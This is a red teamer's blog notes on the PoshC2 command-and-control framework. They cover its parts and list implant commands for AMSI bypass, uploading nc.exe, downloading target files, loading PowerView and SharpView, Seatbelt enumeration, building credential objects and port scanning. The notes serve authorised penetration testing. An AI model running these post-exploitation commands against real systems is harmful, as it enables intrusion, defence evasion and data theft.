PoshC2: A Red Teamer's Notes
A quick reference guide for using PoshC2, a post-exploitation framework, during penetration testing and red teaming engagements.
This is an ongoing post containing my notes on PoshC2 usage.
What is PoshC2?
PoshC2 is a command and control software. It is used to carry out post-exploitation tasks such as persistence, privilege escalation, lateral movements etc. during penetration testing and red teaming exercises. It supports Python3, PowerShell (v2 and v5), C# and C++. The official documentation is available here.
All of PoshC2 functionality can be divided into five components:
PoshC2 Server - Serves payloads that can be executed on target machine(s) and send a connection back to PoshC2. The server console also displays the output of command(s) executed on an implant. The server is written in Python.
Implants Receiver - Listens for the incoming implant connections and aggregates them. It is also used to load modules and execute commands on a single, multiple or all implants.
Payloads - Commands, shellcode, executable binaries that when executed on target machine(s) (aka implants) sends back a connection to Implant receiver. Payloads are developed using C#, Python, PowerShell, JavaScript, VBScript and support Windows, Linux (Python) and MacOS (Python).
Implants - Target machine(s) connected to PoshC2.
Modules - Scripts (PowerShell and Python) and executable binaries (C#) that help in conducting various post-exploitation tasks such as enumeration, privilege escalation, lateral movement, hash dump, port forwarding etc. A comprehensive list of modules is available here.
How to use?
The following video shows how to get PoshC2 up and running quickly. It covers:
Installation on Kali Linux 2020.2
Configuring PoshC2
Running Posh-server and implants receiver
Managing implants
Modules
Loading C# and PowerShell modules on an Implant
Running commands on an implant
Read this to learn more about the lab environment used in this video.
Useful Commands (C# Implants)
Selecting Implant(s)
To select a single implant, enter the ImplantID
To select multiple implants, enter a comma separated list of ImplantIDs
To select all implants, enter ALL
Quick Reference List of Commands
Issue the following command when connected to an implant(s)
help
Bypass AMSI
bypass-amsi
Upload files
upload-file <source file path> <destination file path>
Example: upload-file /usr/share/windows-binaries/nc.exe C:\Users\Public\nc.exe
Download files
download-file <file path>
Example: download-file 'C:\\Users\\Public\\supersecretdata.txt'
This will save a copy of the target file in the PoshC2 project directory.
List Modules
To list implant specific modules, select an implant and issue the following command:
listmodules
To list all modules, issue the following command at implant selection prompt:
listmodules
Load a C# Module
loadmodule <module name>
Example: loadmodule SharpView.exe
Load a PowerShell Module
pslo <module name>
Example: pslo powerview.ps1
You can also use loadmoduleforce to load modules.
Execute a PowerShell Command
sharpps <command>
Example: sharpps Get-ChildItem -Force -Recurse
Convert Username and Password to a PSCredentials object
sharpps [string]$userName = 'IND\user.ind02'
sharpps [string]$userPassword = 'Sup3rStr0ngP@ssw0rd'
sharpps [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
sharpps [pscredential]$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)
After executing above commands, $credObject can be passed as a value to -Credential parameter in PowerShell commands which accept this parameter.
Enumerate an Implant
ls-recurse <directory path>
Example: ls-recurse C:\Users
get-userinfo
get-computerinfo
loadmodule Seatbelt.exe
seatbelt all
sharpup
Port Scan
portscan <IP> <port> <delay-in-seconds> <max thread>
Example: portscan "192.168.3.8" "1-1000" 1 100
Subscribe to Yaksas Security
Cybersecurity Research